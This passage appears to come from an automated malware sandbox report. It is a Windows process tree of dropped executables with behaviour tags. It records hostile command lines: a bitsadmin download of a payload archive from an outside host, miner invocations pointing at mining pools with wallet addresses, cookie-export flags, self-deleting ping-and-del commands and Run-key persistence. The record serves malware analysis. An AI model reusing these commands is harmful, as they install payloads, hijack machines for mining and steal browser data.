                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\oibju4sg.f3d\instEU.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:5632
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2gwgjjqb.ttx\md1_1eaf.exe & exit
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:4736
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\2gwgjjqb.ttx\md1_1eaf.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\2gwgjjqb.ttx\md1_1eaf.exe
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                PID:5000
                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qdi3ihw.0hv\google-game.exe & exit
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:4872
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0qdi3ihw.0hv\google-game.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\0qdi3ihw.0hv\google-game.exe
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:5888
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6000
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1xnesjsj.rby\y1.exe & exit
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:3324
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1xnesjsj.rby\y1.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1xnesjsj.rby\y1.exe
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:2788
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5tuINT6XjC.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5tuINT6XjC.exe"
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:6204
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1619212946863.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1619212946863.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619212946863.txt"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:6936
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\5tuINT6XjC.exe"
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:6268
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                ping 127.0.0.1 -n 3
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:6940
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrtrcbn1.qig\inst.exe & exit
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:4948
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\mrtrcbn1.qig\inst.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\mrtrcbn1.qig\inst.exe
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:5040
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\imj220vc.kv0\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                              PID:952
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\imj220vc.kv0\SunLabsPlayer.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\imj220vc.kv0\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                PID:6072
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                    PID:2076
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                      PID:7032
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                        PID:6956
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:6312
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:6472
                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:4732
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:6344
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                PID:396
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                PID:6644
                                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -poeWnrHrvM7MCbDA -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                PID:6384
                                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pjlLAVBBbnyzh2Zt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:5676
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:3880
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:1072
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:4372
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:7044
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:4104
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          PID:1100
                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\CWUXzWKCkA\CWUXzWKCkA.dll" CWUXzWKCkA
                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                            PID:6224
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                              PID:6604
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                              PID:6300
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                PID:1788
                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd3021.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:6584
                                                                                                                                                                                                                                                                • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:6912
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ryvl0ifs.250\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:5444
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uvdbshfg.are\toolspab1.exe & exit
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                  PID:4504
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uvdbshfg.are\toolspab1.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\uvdbshfg.are\toolspab1.exe
                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:5732
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uvdbshfg.are\toolspab1.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\uvdbshfg.are\toolspab1.exe
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:4760
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uoh350fq.krr\c7ae36fa.exe & exit
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                    PID:4576
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\uoh350fq.krr\c7ae36fa.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\uoh350fq.krr\c7ae36fa.exe
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:6180
                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ze0jobfn.rkg\app.exe /8-2222 & exit
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                      PID:2080
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ze0jobfn.rkg\app.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ze0jobfn.rkg\app.exe /8-2222
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:6316
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ze0jobfn.rkg\app.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ze0jobfn.rkg\app.exe" /8-2222
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                          PID:5400
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\95D.tmp.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\95D.tmp.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                PID:4816
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\95D.tmp.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\95D.tmp.exe"
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                  PID:5628
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\E21.tmp.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\E21.tmp.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                PID:2228
                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w27001@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                  -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w7354 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                  PID:668
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5500
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                    ping 127.0.0.1
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                PID:6216
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                PID:200
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:804
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:5040
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:428
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4948
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              PID:1744
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                              PID:4892
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:2808
                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                                                                              PID:5808
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:6848
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:5972
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:6676
                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                              PID:6960
                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                              PID:6164
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1BC7.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1BC7.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:1040
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1CD2.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1CD2.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                                                              • NTFS ADS
                                                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\231C.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\231C.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:6204
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\302D.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\302D.exe
                                                                                                                                                                                                                                                                1⤵
